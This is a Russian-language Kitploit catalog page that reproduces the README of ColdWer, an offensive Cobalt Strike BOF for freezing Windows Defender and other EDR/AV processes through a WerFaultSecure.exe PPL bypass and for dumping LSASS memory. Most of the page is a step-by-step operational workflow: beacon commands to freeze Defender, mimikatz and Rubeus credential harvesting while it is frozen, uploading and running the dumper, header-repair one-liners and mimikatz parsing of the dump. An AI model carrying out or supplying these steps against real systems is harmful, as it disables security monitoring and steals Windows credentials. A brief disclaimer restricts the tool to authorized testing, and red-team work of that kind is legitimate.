Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
ColdWer — Cobalt Strike BOF для заморозки процессов EDR/AV и дампа LSASS с использованием обхода PPL через WerFaultSecure.exe | Kitploit
Инструменты/GitHubGitHub/0xsh3llf1r3/coldwer
Повышение привилегийЭксплуатацияЛатеральное перемещениеПост-эксплуатацияRed TeamingРазработка Полезной Нагрузки
GitHub0xsh3llf1r3/coldwer

ColdWer

Cobalt Strike BOF для заморозки процессов EDR/AV и дампа LSASS с использованием обхода PPL через WerFaultSecure.exe

Репозиторий
144236 месяцев назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

ColdWer
Холодная война на вашем конечном устройстве.

Stars Forks License


🥶 ColdWer

ColdWer использует обход PPL через WerFaultSecure.exe, чтобы заморозить процессы EDR/AV и выполнить дамп памяти LSASS на современных системах Windows.

root@kitploit:~
C O L D W E R
        └─┴─┴── WerFaultSecure
    └─┴──────── LSASS Dump
└─┴──────────── Cold (Freeze)

Заморозьте ваш EDR/AV. Извлеките то, что нужно. Оставайтесь холодными.


👤 Автор

Sh3llf1r3 (@0xsh3llf1r3)


🙏 Благодарности

Этот проект основан на исследованиях TwoSevenOneT (@TwoSevenOneT):

ProjectDescription
EDR-FreezeОригинальная техника заморозки EDR
WSASSДамп LSASS через WerFaultSecure

Вся заслуга за основные техники принадлежит TwoSevenOneT.


🔥 Возможности


🚀 Начало работы

📋 Предварительные требования

  • Cobalt Strike 4.x
  • Beacon с высокой целостностью (Administrator/SYSTEM)

💾 Установка

  1. Клонируйте репозиторий:
root@kitploit:~
git clone https://github.com/0xsh3llf1r3/ColdWer.git
  1. Загрузите скрипт агрессора в Cobalt Strike:
  • Перейдите в Cobalt Strike → Script Manager
  • Нажмите Load
  • Выберите cw/coldwer.cna

📦 Сборка из исходников

root@kitploit:~
# Перейдите в директорию исходников
cd src/

# Скомпилируйте BOF (требуется MinGW)
make

# Или вручную:
x86_64-w64-mingw32-gcc -c coldwer.c -o ../cw/coldwer.o

📥 Быстрая загрузка

  1. Перейдите на Releases
  2. Скачайте coldwer.o и coldwer.cna
  3. Поместите оба файла в одну папку
  4. Загрузите coldwer.cna в Cobalt Strike

🖥️ Использование

❄️ Заморозка EDR/AV

root@kitploit:~
# Найдите PID Windows Defender
beacon> ps

# Заморозьте процесс
beacon> cw-freeze 1337

# Выполните свои команды, пока EDR/AV заморожен
beacon> mimikatz sekurlsa::logonpasswords
beacon> execute-assembly /tools/Rubeus.exe triage

# Разморозьте, когда закончите
beacon> cw-unfreeze

🔓 Дамп LSASS

root@kitploit:~

# Шаг 1: Загрузите WerFaultSecure.exe из Win8.1
beacon> cd C:\Windows\Temp
beacon> upload /path/to/bin/wfs.exe

# Шаг 2: Найдите PID LSASS
beacon> ps

# Шаг 3: Выполните дамп LSASS
beacon> cw-dump 314 C:\Windows\Temp\wfs.exe

# Шаг 4: Скачайте дамп
beacon> download C:\Windows\Temp\lsass.dmp

🔧 После скачивания

Измените заголовок файла, чтобы восстановить формат minidump:

Original (PNG)Change to (MDMP)
89 50 4E 474D 44 4D 50

Команды для восстановления заголовка:

MethodCommand
Pythonopen('lsass.dmp','r+b').write(b'MDMP')
Bashprintf '\x4d\x44\x4d\x50' | dd of=lsass.dmp bs=1 count=4 conv=notrunc
PowerShell$f=[IO.File]::Open("lsass.dmp","Open","Write");$f.Write([byte[]](0x4D,0x44,0x4D,0x50),0,4);$f.Close()

Затем проанализируйте с помощью Mimikatz:

root@kitploit:~
mimikatz# sekurlsa::minidump lsass.dmp
mimikatz# sekurlsa::logonpasswords

📋 Команды

CommandDescription
cw-freeze <PID> [Path]Заморозить процесс
cw-unfreezeРазморозить ранее замороженный процесс
cw-dump <PID> <Path>Выполнить дамп памяти LSASS

📝 Примеры

root@kitploit:~
# Заморозка с путём по умолчанию
beacon> cw-freeze 1337

# Использовать пользовательский WerFaultSecure.exe
beacon> cw-freeze 1337 C:\Windows\Temp\wfs.exe

# Дамп LSASS
beacon> cw-dump 314 C:\Windows\Temp\wfs.exe

# Разморозка, когда закончите
beacon> cw-unfreeze

✅ Поддерживаемые цели

TargetStatus
Windows Defender (MsMpEng.exe)✅ Работает
LSASS (lsass.exe)✅ Работает
Other PPL processes✅ Работает

⚠️ Ограничения

НЕ работает против EDR с самозащитой на уровне ядра:

EDRStatus
Elastic Endpoint❌ Заблокировано
CrowdStrike Falcon❌ Заблокировано
SentinelOne❌ Заблокировано
Carbon Black❌ Заблокировано

⚙️ Как это работает

root@kitploit:~
1. 🚀 Запуск WerFaultSecure.exe как PPL (уровень WinTcb)
                    ↓
2. 🎯 WerFaultSecure подключается к целевому процессу
                    ↓
3. ⏸️  MiniDumpWriteDump приостанавливает все потоки целевого процесса
                    ↓
4. 🥶 Приостановка самого WerFaultSecure → Цель остаётся замороженной
                    ↓
5. ✅ Выполнение ваших команд (EDR/AV не видит!)
                    ↓
6. 🔥 Завершение WerFaultSecure → Цель размораживается

🔑 Почему WerFaultSecure из Win8.1?

VersionOutput
Windows 10/11Только зашифрованный дамп
Windows 8.1Сырой незашифрованный дамп

🔍 Устранение неполадок


⚖️ Disclaimer

root@kitploit:~
⚠️ FOR AUTHORIZED SECURITY TESTING ONLY

This tool is intended for:
- Authorized penetration testing
- Red team operations with written permission
- Security research in controlled environments

The author is not responsible for any misuse or damage caused by this tool.
Unauthorized access to computer systems is illegal.

📜 Лицензия

MIT License - См. LICENSE


🥶 Оставайтесь холодными. Оставайтесь тихими. 🥶

⭐ Поставьте звезду этому репозиторию, если он полезен! ⭐

Скачать инструмент
FeatureDescription
❄️ ЗаморозкаПереводит процессы EDR/AV в состояние комы
🔓 ДампИзвлекает память LSASS в обход PPL
🛡️ Обход PPLИспользует WerFaultSecure.exe на уровне WinTcb
⚡ БыстроВыполнение встроенного BOF
🎯 Ручное управлениеВы решаете, когда заморозить и разморозить
ErrorCauseSolution
File not foundInvalid pathCheck WerFaultSecure.exe path
Access deniedLow privilegesRun as Administrator/SYSTEM
Invalid signatureUnsigned binaryUse properly signed WerFaultSecure.exe
Process does not existWrong PIDVerify PID with ps command
Target protectedKernel protectionEDR has self-protection (not bypassable)
Already frozenState stuckRun cw-unfreeze first